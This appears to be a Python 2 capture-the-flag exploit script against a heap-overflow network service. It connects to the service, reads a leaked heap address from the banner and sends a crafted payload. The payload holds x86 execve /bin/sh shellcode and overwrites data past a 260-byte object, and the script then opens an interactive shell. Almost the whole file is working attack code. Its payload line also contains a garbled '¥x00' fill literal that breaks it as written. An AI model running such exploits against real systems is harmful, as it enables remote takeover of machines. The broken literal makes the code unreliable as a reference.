- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- import socket, struct, re, telnetlib
- ###################### useful function definition
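def sock(remoteip, remoteport):
    """Open a TCP connection to (remoteip, remoteport).

    Returns the connected socket together with an unbuffered read/write
    file object wrapping it (bufsize=0, so each read/write goes straight
    to the socket).  Raises socket.error if the connection cannot be
    established; the half-created socket is closed first so the file
    descriptor is not leaked (the original returned without cleanup).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((remoteip, remoteport))
    except socket.error:
        # connect() failed: release the descriptor before propagating.
        s.close()
        raise
    return s, s.makefile('rw', bufsize=0)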
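def read_until(f, delim='\n'):
    """Read from f one character at a time until the data ends with delim.

    Returns everything read, including the delimiter itself.  An empty
    delim matches immediately and returns ''.  Raises EOFError if the
    stream ends before delim is seen: f.read(1) returns '' at EOF, and the
    original loop would then spin forever because '' never extends data.
    """
    data = ''
    while not data.endswith(delim):
        ch = f.read(1)
        if not ch:
            raise EOFError('stream closed before delimiter %r was seen' % (delim,))
        data += ch
    return data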
def p(a):
    """Return the integer a packed as a 4-byte little-endian unsigned value."""
    packer = struct.Struct("<I")
    return packer.pack(a)
def shell(s):
    """Attach an interactive telnetlib session to the already-connected socket s.

    Telnet.interact() relays the local terminal to the socket and blocks
    while doing so.  Note that telnetlib is deprecated (PEP 594) and removed
    in Python 3.13; this file targets Python 2.
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
###################### main
# linux/x86/execve_binsh
# Hard-coded 24-byte x86 payload (comment above gives its purpose); not derived from anything on this page.
shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
# Connect to the local test instance; the commented-out line below is the remote target that was used alternatively.
s, f = sock("localhost", 4088)
#s, f = sock("katagaitai.orz.hm", 1111)
# Consume the banner up to and including the service's write prompt; the prompt names the object size (260).
ret = read_until(f, "Write to object [size=260]:")
print ret
# The banner contains several "loc=<hex>" entries; the 11th one (index 10) is taken as a heap address.
# NOTE(review): the service echoes object addresses to the client. That information leak is what lets
# the payload below reference an absolute heap address; a hardened service would not expose addresses.
heap_addr = int(re.findall(r"loc=([^]]+)", ret)[10], 16)
print hex(heap_addr)
# Payload layout: 2-byte stub, 8 bytes of filler, shellcode padded to 250 bytes -> 2 + 8 + 250 = 260,
# exactly the object size in the prompt; the three packed 32-bit words after it are written beyond
# the object, i.e. the service does not bound the write to the declared size.
# 0x0804C004 is a hard-coded absolute address in the target binary; its meaning is not visible here.
# NOTE(review): '¥x00' as pasted is a multi-character literal (looks like an encoding artefact of the
# paste); str.ljust requires a one-character fill, so this line raises TypeError exactly as written.
sc = "\xeb\x08" + '¥x00'*8 + shellcode.ljust(250, '¥x00') + p(0xfffffffd) + p(0x0804C004-8) + p(heap_addr)
# Send the payload as one line (the service reads line-delimited input, per the prompt protocol above).
f.write(sc + "\n")
# Hand the socket to an interactive session; blocks from here on.
shell(s)